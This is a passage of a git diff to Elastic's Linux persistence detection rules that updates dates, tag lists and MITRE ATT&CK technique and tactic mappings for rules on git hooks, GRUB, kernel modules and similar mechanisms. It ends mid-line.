-131,16 +114,16 @@ reference = "https://attack.mitre.org/tactics/TA0003/" framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1195" -name = "Supply Chain Compromise" -reference = "https://attack.mitre.org/techniques/T1195/" +id = "T1546" +name = "Event Triggered Execution" +reference = "https://attack.mitre.org/techniques/T1546/" [[rule.threat.technique.subtechnique]] -id = "T1195.002" -name = "Compromise Software Supply Chain" -reference = "https://attack.mitre.org/techniques/T1195/002/" +id = "T1546.016" +name = "Installer Packages" +reference = "https://attack.mitre.org/techniques/T1546/016/" [rule.threat.tactic] -name = "Initial Access" -id = "TA0001" -reference = "https://attack.mitre.org/tactics/TA0001/" +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/linux/persistence_dracut_module_creation.toml b/rules/linux/persistence_dracut_module_creation.toml index 9427236d5fb..d0e21bd892a 100644 --- a/rules/linux/persistence_dracut_module_creation.toml +++ b/rules/linux/persistence_dracut_module_creation.toml @@ -2,7 +2,7 @@ creation_date = "2025/01/16" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/22" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -76,18 +76,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Tactic: Execution", - "Tactic: Defense Evasion", - "Data Source: Elastic Defend", - "Data Source: SentinelOne", - "Data Source: Elastic Endgame", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Persistence", "Data Source: Elastic Defend", "Data Source: SentinelOne", "Data Source: Elastic Endgame", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -128,43 +117,7 @@ id = "T1542" name = "Pre-OS Boot" reference = "https://attack.mitre.org/techniques/T1542/" -[[rule.threat.technique]] -id = "T1543" -name = "Create or Modify System Process" -reference = "https://attack.mitre.org/techniques/T1543/" - -[[rule.threat.technique]] -id = "T1574" -name = "Hijack Execution Flow" -reference = "https://attack.mitre.org/techniques/T1574/" - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" - -[[rule.threat.technique.subtechnique]] -id = "T1059.004" -name = "Unix Shell" -reference = "https://attack.mitre.org/techniques/T1059/004/" - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/linux/persistence_dynamic_linker_backup.toml b/rules/linux/persistence_dynamic_linker_backup.toml index 2dcef6e4fb8..93e45dc6fa5 100644 --- a/rules/linux/persistence_dynamic_linker_backup.toml +++ b/rules/linux/persistence_dynamic_linker_backup.toml @@ -2,7 +2,7 @@ creation_date = "2022/07/12" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/17" +updated_date = "2026/03/23" [transform] [[transform.osquery]] @@ -153,16 +153,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "high" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Threat: Orbit", - "Data Source: Elastic Defend", - "Data Source: SentinelOne", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Threat: Orbit", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Elastic Defend", "Data Source: SentinelOne", "Resources: Investigation Guide"] type = "eql" query = ''' sequence by process.entity_id with maxspan=1m @@ -192,3 +183,21 @@ reference = "https://attack.mitre.org/techniques/T1574/006/" id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1574" +name = "Hijack Execution Flow" +reference = "https://attack.mitre.org/techniques/T1574/" + +[[rule.threat.technique.subtechnique]] +id = "T1574.006" +name = "Dynamic Linker Hijacking" +reference = "https://attack.mitre.org/techniques/T1574/006/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/linux/persistence_extract_initramfs_via_cpio.toml b/rules/linux/persistence_extract_initramfs_via_cpio.toml index 3116b612026..e22479339de 100644 --- a/rules/linux/persistence_extract_initramfs_via_cpio.toml +++ b/rules/linux/persistence_extract_initramfs_via_cpio.toml @@ -2,7 +2,7 @@ creation_date = "2025/01/16" integration = ["endpoint", "auditd_manager", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/22" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -122,16 +122,6 @@ id = "T1542" name = "Pre-OS Boot" reference = "https://attack.mitre.org/techniques/T1542/" -[[rule.threat.technique]] -id = "T1543" -name = "Create or Modify System Process" -reference = "https://attack.mitre.org/techniques/T1543/" - -[[rule.threat.technique]] -id = "T1574" -name = "Hijack Execution Flow" -reference = "https://attack.mitre.org/techniques/T1574/" - [rule.threat.tactic] id = "TA0003" name = "Persistence" diff --git a/rules/linux/persistence_git_hook_execution.toml b/rules/linux/persistence_git_hook_execution.toml index 55473220b03..2406032af88 100644 --- a/rules/linux/persistence_git_hook_execution.toml +++ b/rules/linux/persistence_git_hook_execution.toml @@ -2,7 +2,7 @@ creation_date = "2024/07/15" integration = ["endpoint", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/12/22" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -83,18 +83,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Tactic: Execution", - "Tactic: Defense Evasion", - "Data Source: Elastic Defend", - "Data Source: SentinelOne", - "Resources: Investigation Guide", - "Data Source: Crowdstrike", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Execution", "Tactic: Persistence", "Data Source: Elastic Defend", "Data Source: SentinelOne", "Resources: Investigation Guide", "Data Source: Crowdstrike"] type = "eql" query = ''' sequence by host.id with maxspan=3s @@ -109,24 +98,6 @@ sequence by host.id with maxspan=3s [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1543" -name = "Create or Modify System Process" -reference = "https://attack.mitre.org/techniques/T1543/" - -[[rule.threat.technique]] -id = "T1574" -name = "Hijack Execution Flow" -reference = "https://attack.mitre.org/techniques/T1574/" - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" @@ -145,7 +116,12 @@ reference = "https://attack.mitre.org/tactics/TA0002/" [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1546" +name = "Event Triggered Execution" +reference = "https://attack.mitre.org/techniques/T1546/" + [rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/linux/persistence_git_hook_file_creation.toml b/rules/linux/persistence_git_hook_file_creation.toml index c5b9d78a19a..10d5c0ad0dd 100644 --- a/rules/linux/persistence_git_hook_file_creation.toml +++ b/rules/linux/persistence_git_hook_file_creation.toml @@ -2,7 +2,7 @@ creation_date = "2024/06/26" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/22" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -84,18 +84,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Tactic: Execution", - "Tactic: Defense Evasion", - "Data Source: Elastic Defend", - "Data Source: SentinelOne", - "Data Source: Elastic Endgame", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Persistence", "Data Source: Elastic Defend", "Data Source: SentinelOne", "Data Source: Elastic Endgame", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -125,42 +114,11 @@ file.extension == null and process.executable != null and not ( framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1543" -name = "Create or Modify System Process" -reference = "https://attack.mitre.org/techniques/T1543/" - -[[rule.threat.technique]] -id = "T1574" -name = "Hijack Execution Flow" -reference = "https://attack.mitre.org/techniques/T1574/" +id = "T1546" +name = "Event Triggered Execution" +reference = "https://attack.mitre.org/techniques/T1546/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" - -[[rule.threat.technique.subtechnique]] -id = "T1059.004" -name = "Unix Shell" -reference = "https://attack.mitre.org/techniques/T1059/004/" - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/linux/persistence_git_hook_netcon.toml b/rules/linux/persistence_git_hook_netcon.toml index 3c79ca6de78..b1d7c9ec078 100644 --- a/rules/linux/persistence_git_hook_netcon.toml +++ b/rules/linux/persistence_git_hook_netcon.toml @@ -2,7 +2,7 @@ creation_date = "2024/07/15" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/22" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -85,16 +85,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Tactic: Execution", - "Tactic: Defense Evasion", - "Data Source: Elastic Defend", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Command and Control", "Tactic: Execution", "Tactic: Persistence", "Data Source: Elastic Defend", "Resources: Investigation Guide"] type = "eql" query = ''' sequence by host.id with maxspan=3s @@ -119,19 +110,14 @@ sequence by host.id with maxspan=3s framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1543" -name = "Create or Modify System Process" -reference = "https://attack.mitre.org/techniques/T1543/" - -[[rule.threat.technique]] -id = "T1574" -name = "Hijack Execution Flow" -reference = "https://attack.mitre.org/techniques/T1574/" +id = "T1071" +name = "Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1071/" [rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" [[rule.threat]] framework = "MITRE ATT&CK" @@ -154,7 +140,12 @@ reference = "https://attack.mitre.org/tactics/TA0002/" [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1546" +name = "Event Triggered Execution" +reference = "https://attack.mitre.org/techniques/T1546/" + [rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/linux/persistence_git_hook_process_execution.toml b/rules/linux/persistence_git_hook_process_execution.toml index 2203dc37a30..eaaeea7afa9 100644 --- a/rules/linux/persistence_git_hook_process_execution.toml +++ b/rules/linux/persistence_git_hook_process_execution.toml @@ -2,7 +2,7 @@ creation_date = "2024/06/26" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/22" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -89,19 +89,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Tactic: Execution", - "Tactic: Defense Evasion", - "Data Source: Elastic Defend", - "Data Source: Crowdstrike", - "Data Source: SentinelOne", - "Data Source: Elastic Endgame", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Execution", "Tactic: Persistence", "Data Source: Elastic Defend", "Data Source: Crowdstrike", "Data Source: SentinelOne", "Data Source: Elastic Endgame", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -127,24 +115,6 @@ not process.name in ("git", "dirname") [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1543" -name = "Create or Modify System Process" -reference = "https://attack.mitre.org/techniques/T1543/" - -[[rule.threat.technique]] -id = "T1574" -name = "Hijack Execution Flow" -reference = "https://attack.mitre.org/techniques/T1574/" - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" @@ -163,7 +133,12 @@ reference = "https://attack.mitre.org/tactics/TA0002/" [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1546" +name = "Event Triggered Execution" +reference = "https://attack.mitre.org/techniques/T1546/" + [rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/linux/persistence_grub_configuration_creation.toml b/rules/linux/persistence_grub_configuration_creation.toml index d3c5b78af10..0e3eb428f97 100644 --- a/rules/linux/persistence_grub_configuration_creation.toml +++ b/rules/linux/persistence_grub_configuration_creation.toml @@ -2,7 +2,7 @@ creation_date = "2025/01/16" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/22" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -76,18 +76,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Tactic: Execution", - "Tactic: Defense Evasion", - "Data Source: Elastic Defend", - "Data Source: SentinelOne", - "Data Source: Elastic Endgame", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Persistence", "Data Source: Elastic Defend", "Data Source: SentinelOne", "Data Source: Elastic Endgame", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -129,16 +118,6 @@ id = "T1542" name = "Pre-OS Boot" reference = "https://attack.mitre.org/techniques/T1542/" -[[rule.threat.technique]] -id = "T1543" -name = "Create or Modify System Process" -reference = "https://attack.mitre.org/techniques/T1543/" - -[[rule.threat.technique]] -id = "T1574" -name = "Hijack Execution Flow" -reference = "https://attack.mitre.org/techniques/T1574/" - [rule.threat.tactic] id = "TA0003" name = "Persistence" diff --git a/rules/linux/persistence_grub_makeconfig.toml b/rules/linux/persistence_grub_makeconfig.toml index dc757627521..7bdd557c7ce 100644 --- a/rules/linux/persistence_grub_makeconfig.toml +++ b/rules/linux/persistence_grub_makeconfig.toml @@ -2,7 +2,7 @@ creation_date = "2025/01/16" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/22" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -119,16 +119,6 @@ id = "T1542" name = "Pre-OS Boot" reference = "https://attack.mitre.org/techniques/T1542/" -[[rule.threat.technique]] -id = "T1543" -name = "Create or Modify System Process" -reference = "https://attack.mitre.org/techniques/T1543/" - -[[rule.threat.technique]] -id = "T1574" -name = "Hijack Execution Flow" -reference = "https://attack.mitre.org/techniques/T1574/" - [rule.threat.tactic] id = "TA0003" name = "Persistence" diff --git a/rules/linux/persistence_init_d_file_creation.toml b/rules/linux/persistence_init_d_file_creation.toml index b4d7276cf08..1285bab4907 100644 --- a/rules/linux/persistence_init_d_file_creation.toml +++ b/rules/linux/persistence_init_d_file_creation.toml @@ -2,7 +2,7 @@ creation_date = "2023/03/21" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/22" +updated_date = "2026/03/23" [transform] [[transform.osquery]] @@ -192,6 +192,11 @@ id = "T1037" name = "Boot or Logon Initialization Scripts" reference = "https://attack.mitre.org/techniques/T1037/" +[[rule.threat.technique.subtechnique]] +id = "T1037.004" +name = "RC Scripts" +reference = "https://attack.mitre.org/techniques/T1037/004/" + [rule.threat.tactic] id = "TA0003" name = "Persistence" diff --git a/rules/linux/persistence_insmod_kernel_module_load.toml b/rules/linux/persistence_insmod_kernel_module_load.toml index b0fd18bbca5..92ea71412a6 100644 --- a/rules/linux/persistence_insmod_kernel_module_load.toml +++ b/rules/linux/persistence_insmod_kernel_module_load.toml @@ -2,7 +2,7 @@ creation_date = "2022/07/11" integration = ["endpoint", "auditd_manager", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/02/18" +updated_date = "2026/03/23" [transform] [[transform.osquery]] @@ -192,6 +192,19 @@ not ( [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1014" +name = "Rootkit" +reference = "https://attack.mitre.org/techniques/T1014/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1547" name = "Boot or Logon Autostart Execution" @@ -206,16 +219,3 @@ reference = "https://attack.mitre.org/techniques/T1547/006/" id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1014" -name = "Rootkit" -reference = "https://attack.mitre.org/techniques/T1014/" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/linux/persistence_kde_autostart_modification.toml b/rules/linux/persistence_kde_autostart_modification.toml index 58550c3b588..9edc27b511d 100644 --- a/rules/linux/persistence_kde_autostart_modification.toml +++ b/rules/linux/persistence_kde_autostart_modification.toml @@ -2,7 +2,7 @@ creation_date = "2021/01/06" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/22" +updated_date = "2026/03/23" [transform] [[transform.osquery]] @@ -243,6 +243,11 @@ id = "T1547" name = "Boot or Logon Autostart Execution" reference = "https://attack.mitre.org/techniques/T1547/" +[[rule.threat.technique.subtechnique]] +id = "T1547.013" +name = "XDG Autostart Entries" +reference = "https://attack.mitre.org/techniques/T1547/013/" + [rule.threat.tactic] id = "TA0003" name = "Persistence" diff --git a/rules/linux/persistence_kernel_driver_load.toml b/rules/linux/persistence_kernel_driver_load.toml index 0f7b646be9e..a705e1909cf 100644 --- a/rules/linux/persistence_kernel_driver_load.toml +++ b/rules/linux/persistence_kernel_driver_load.toml @@ -2,7 +2,7 @@ creation_date = "2023/10/26" integration = ["auditd_manager"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -96,31 +96,31 @@ Kernel modules extend the functionality of the Linux kernel, allowing dynamic lo [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1014" +name = "Rootkit" +reference = "https://attack.mitre.org/techniques/T1014/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1547" name = "Boot or Logon Autostart Execution" reference = "https://attack.mitre.org/techniques/T1547/" + [[rule.threat.technique.subtechnique]] id = "T1547.006" name = "Kernel Modules and Extensions" reference = "https://attack.mitre.org/techniques/T1547/006/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1014" -name = "Rootkit" -reference = "https://attack.mitre.org/techniques/T1014/" - - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/linux/persistence_kernel_driver_load_by_non_root.toml b/rules/linux/persistence_kernel_driver_load_by_non_root.toml index 9f4a8303937..264a2ebba28 100644 --- a/rules/linux/persistence_kernel_driver_load_by_non_root.toml +++ b/rules/linux/persistence_kernel_driver_load_by_non_root.toml @@ -2,7 +2,7 @@ creation_date = "2024/01/10" integration = ["auditd_manager"] maturity = "production" -updated_date = "2025/12/22" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -101,6 +101,19 @@ auditd.data.syscall in ("init_module", "finit_module") and user.id != "0" [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1014" +name = "Rootkit" +reference = "https://attack.mitre.org/techniques/T1014/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1547" name = "Boot or Logon Autostart Execution" @@ -115,16 +128,3 @@ reference = "https://attack.mitre.org/techniques/T1547/006/" id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1014" -name = "Rootkit" -reference = "https://attack.mitre.org/techniques/T1014/" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/linux/persistence_kernel_module_load_from_unusual_location.toml b/rules/linux/persistence_kernel_module_load_from_unusual_location.toml index 6a383383172..474b8cef8fd 100644 --- a/rules/linux/persistence_kernel_module_load_from_unusual_location.toml +++ b/rules/linux/persistence_kernel_module_load_from_unusual_location.toml @@ -2,7 +2,7 @@ creation_date = "2026/02/20" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/13" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -118,6 +118,19 @@ not ( [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1014" +name = "Rootkit" +reference = "https://attack.mitre.org/techniques/T1014/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1547" name = "Boot or Logon Autostart Execution" @@ -132,16 +145,3 @@ reference = "https://attack.mitre.org/techniques/T1547/006/" id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1014" -name = "Rootkit" -reference = "https://attack.mitre.org/techniques/T1014/" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/linux/persistence_kernel_object_file_creation.toml b/rules/linux/persistence_kernel_object_file_creation.toml index e5b8aede59e..eed8a4ed3c7 100644 --- a/rules/linux/persistence_kernel_object_file_creation.toml +++ b/rules/linux/persistence_kernel_object_file_creation.toml @@ -2,7 +2,7 @@ creation_date = "2024/12/19" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/22" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -79,15 +79,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Tactic: Defense Evasion", - "Data Source: Elastic Defend", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Elastic Defend", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "new_terms" query = ''' @@ -129,15 +121,19 @@ reference = "https://attack.mitre.org/tactics/TA0003/" framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1014" -name = "Rootkit" -reference = "https://attack.mitre.org/techniques/T1014/" +id = "T1547" +name = "Boot or Logon Autostart Execution" +reference = "https://attack.mitre.org/techniques/T1547/" -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat.technique.subtechnique]] +id = "T1547.006" +name = "Kernel Modules and Extensions" +reference = "https://attack.mitre.org/techniques/T1547/006/" +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" [rule.new_terms] field = "new_terms_fields" value = ["process.name", "file.name"] diff --git a/rules/linux/persistence_kubernetes_sensitive_file_activity.toml b/rules/linux/persistence_kubernetes_sensitive_file_activity.toml index 59a33614ada..60a4a084698 100644 --- a/rules/linux/persistence_kubernetes_sensitive_file_activity.toml +++ b/rules/linux/persistence_kubernetes_sensitive_file_activity.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "cloud_defend"] maturity = "production" min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" min_stack_version = "9.3.0" -updated_date = "2026/02/05" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -121,16 +121,6 @@ id = "T1543.005" name = "Container Service" reference = "https://attack.mitre.org/techniques/T1543/005/" -[[rule.threat.technique]] -id = "T1053" -name = "Scheduled Task/Job" -reference = "https://attack.mitre.org/techniques/T1053/" - -[[rule.threat.technique.subtechnique]] -id = "T1053.007" -name = "Container Orchestration Job" -reference = "https://attack.mitre.org/techniques/T1053/007/" - [rule.threat.tactic] id = "TA0003" name = "Persistence" diff --git a/rules/linux/persistence_kworker_file_creation.toml b/rules/linux/persistence_kworker_file_creation.toml index 428a388aa15..5fb2a701f22 100644 --- a/rules/linux/persistence_kworker_file_creation.toml +++ b/rules/linux/persistence_kworker_file_creation.toml @@ -2,7 +2,7 @@ creation_date = "2023/10/26" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/22" +updated_date = "2026/03/23" [transform] [[transform.osquery]] @@ -152,17 +152,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Tactic: Defense Evasion", - "Data Source: Elastic Defend", - "Data Source: SentinelOne", - "Data Source: Elastic Endgame", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Data Source: Elastic Defend", "Data Source: SentinelOne", "Data Source: Elastic Endgame", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -182,22 +172,14 @@ process.name : "kworker*" and not ( framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1547" -name = "Boot or Logon Autostart Execution" -reference = "https://attack.mitre.org/techniques/T1547/" - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1014" -name = "Rootkit" -reference = "https://attack.mitre.org/techniques/T1014/" +id = "T1036" +name = "Masquerading" +reference = "https://attack.mitre.org/techniques/T1036/" + +[[rule.threat.technique.subtechnique]] +id = "T1036.004" +name = "Masquerade Task or Service" +reference = "https://attack.mitre.org/techniques/T1036/004/" [rule.threat.tactic] id = "TA0005" diff --git a/rules/linux/persistence_linux_backdoor_user_creation.toml b/rules/linux/persistence_linux_backdoor_user_creation.toml index fde1a2aa627..42c38c10005 100644 --- a/rules/linux/persistence_linux_backdoor_user_creation.toml +++ b/rules/linux/persistence_linux_backdoor_user_creation.toml @@ -2,7 +2,7 @@ creation_date = "2023/03/07" integration = ["endpoint", "auditd_manager", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/22" +updated_date 